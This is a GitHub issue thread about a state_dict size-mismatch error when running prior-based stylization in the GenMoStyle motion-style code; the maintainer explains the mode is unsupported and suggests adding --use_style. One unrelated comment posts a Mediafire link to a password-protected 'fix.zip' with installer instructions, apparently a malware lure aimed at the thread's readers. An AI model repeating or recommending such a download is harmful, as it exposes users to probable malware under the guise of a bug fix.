### ISSUE TITLE
command for prior based stylization? 

### ISSUE THREAD

**Issue by meongeun** [Murrol/GenMoStyle-code#4]
Do you have command for prior-based stylization in generation code? (label_based (unsupervised))
I try to run command like this. 
python generate_cmu_l.py --name LVAE_AE_RCE0_KGLE2_12E1_ML160 --gpu_id 0 --dataset_name bfa --motion_length 160 --ext cmu_SP_IK --batch_size 12 --use_ik --niters 1 --sampling

but it showed error.  
 RuntimeError: Error(s) in loading state_dict for StyleContentEncoder:
	size mismatch for style_encoder.ToGlobalCode.0.Conv.conv.weight: copying a param with shape torch.Size([768, 784, 3]) from checkpoint, the shape in current model is torch.Size([768, 768, 3]).

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Murrol** [comment]
Thanks for your interest. `generate_cmu_I` currently doesn't support prior-based stylization (label_based (unsupervised)). The unsupervised checkpoint is trained without style labels while the supervised checkpoint is trained with style labels. 

If you want to get random stylization from the style prior, you could probably modify the code following the motion-based (unsupervised) setting. But instead of obtaining the style code from the style encoder, you sample from the Gaussian noise.


Specifically, in your case, the size discrepancy comes from the following https://github.com/Murrol/GenMoStyle-code/blob/b8bb9366c34d1e6459674e225858510360497147/generate_cmu_l.py#L79
It could be fixed by adding `--use_style`
